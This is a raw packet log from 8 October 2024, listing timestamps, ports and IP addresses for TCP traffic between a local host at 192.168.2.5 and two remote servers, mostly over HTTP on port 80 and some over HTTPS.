Oct 8, 2024 20:47:24.349301100 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.349334955 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.349507093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.349525928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.349536896 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.349549055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.349559069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.349565983 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.349596024 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.367486000 CEST	443	49783	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.371977091 CEST	49783	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.371997118 CEST	443	49783	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.372617960 CEST	49783	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.372622967 CEST	443	49783	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.393861055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.393872976 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.393883944 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.393955946 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.393964052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.393976927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.393985987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.393985987 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.393997908 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.394012928 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.394043922 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.394217014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.394227028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.394247055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.394257069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.394265890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.394268036 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.394277096 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.394284964 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.394288063 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.394299030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.394309998 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.394310951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.394340038 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.394648075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.394658089 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.394669056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.394675016 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.394685030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.394705057 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.394861937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.394872904 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.394881964 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.394891977 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.394907951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.394908905 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.394917965 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.394927025 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.394929886 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.394939899 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.394952059 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.394958019 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.394968033 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.394978046 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.394979000 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.394990921 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.394993067 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.395004034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.395015955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.395018101 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.395026922 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.395039082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.395050049 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.395054102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.395062923 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.395087957 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.395864010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.395875931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.395884991 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.395895958 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.395908117 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.395917892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.395920038 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.395929098 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.395931959 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.395941019 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.395946980 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.395951986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.395962000 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.395972967 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.395972967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.395984888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.395993948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.395997047 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.396003962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.396013975 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.396014929 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.396023989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.396034956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.396044016 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.396054983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.396177053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.396177053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.396177053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.396177053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.396785975 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.396804094 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.396816015 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.396826029 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.396836042 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.396836996 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.396846056 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.396848917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.396859884 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.396869898 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.396878004 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.396882057 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.396891117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.396892071 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.396903992 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.396910906 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.396914959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.396925926 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.396934986 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.396935940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.396949053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.396960020 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.396964073 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.396970034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.396981001 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.396981955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.397003889 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.397027016 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.397728920 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.397739887 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.397748947 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.397758961 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.397769928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.397774935 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.397780895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.397790909 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.397793055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.397804022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.397809029 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.397814035 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.397825956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.397830963 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.397836924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.397846937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.397855043 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.397859097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.397867918 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.397872925 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.397878885 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.397890091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.397900105 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.397902966 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.397913933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.397926092 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.397944927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.398507118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.398518085 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.398526907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.398555994 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.398566961 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.404638052 CEST	443	49784	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.405143976 CEST	49784	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.405167103 CEST	443	49784	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.405504942 CEST	49784	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.405509949 CEST	443	49784	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.435857058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.435930014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.435940981 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.436016083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.436016083 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.436027050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.436037064 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.436048985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.436065912 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.436079979 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.436101913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.436165094 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.436177015 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.436202049 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.436218977 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.436326981 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.436336994 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.436346054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.436357021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.436368942 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.436369896 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.436397076 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.436414957 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.442439079 CEST	443	49785	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.443635941 CEST	49785	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.443666935 CEST	443	49785	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.444228888 CEST	49785	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.444235086 CEST	443	49785	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.468014956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.468044996 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.468105078 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.468105078 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.468146086 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.468173027 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.468183041 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.468193054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.468210936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.468233109 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.468317032 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.468326092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.468359947 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.468487024 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.468497038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.468507051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.468518972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.468525887 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.468528032 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.468539000 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.468555927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.468576908 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.468698025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.468734026 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.469192028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.469234943 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.469254017 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.469264030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.469286919 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.469300032 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.469343901 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.469377041 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.469402075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.469413042 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.469424009 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.469434023 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.469446898 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.469465017 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.469556093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.469647884 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.469657898 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.469667912 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.469679117 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.469692945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.469692945 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.469697952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.469707966 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.469733953 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.469875097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.469909906 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.469954967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.469965935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.469974041 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.469985962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.469995975 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.469995975 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.470007896 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.470021963 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.470037937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.470057011 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.470349073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.470360041 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.470367908 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.470379114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.470391989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.470398903 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.470401049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.470411062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.470423937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.470427990 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.470442057 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.470459938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.470596075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.470698118 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.470717907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.470726967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.470731974 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.470736980 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.470741987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.470746994 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.470751047 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.470756054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.470761061 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.470765114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.470771074 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.470797062 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.470829964 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.471296072 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.471307039 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.471317053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.471327066 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.471337080 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.471354961 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.471358061 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.471365929 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.471374035 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.471375942 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.471394062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.471394062 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.471416950 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.471437931 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.471704960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.471714973 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.471723080 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.471733093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.471745968 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.471750021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.471755028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.471766949 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.471775055 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.471777916 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.471792936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.471813917 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.472067118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.472075939 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.472084999 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.472095966 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.472107887 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.472116947 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.472117901 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.472126961 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.472134113 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.472137928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.472151041 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.472172022 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.472392082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.472402096 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.472440004 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.472520113 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.472529888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.472538948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.472548962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.472558975 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.472564936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.472569942 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.472579002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.472579956 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.472589016 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.472598076 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.472599983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.472609997 CEST	80	49755	95.164.90.97	192.168.2.5
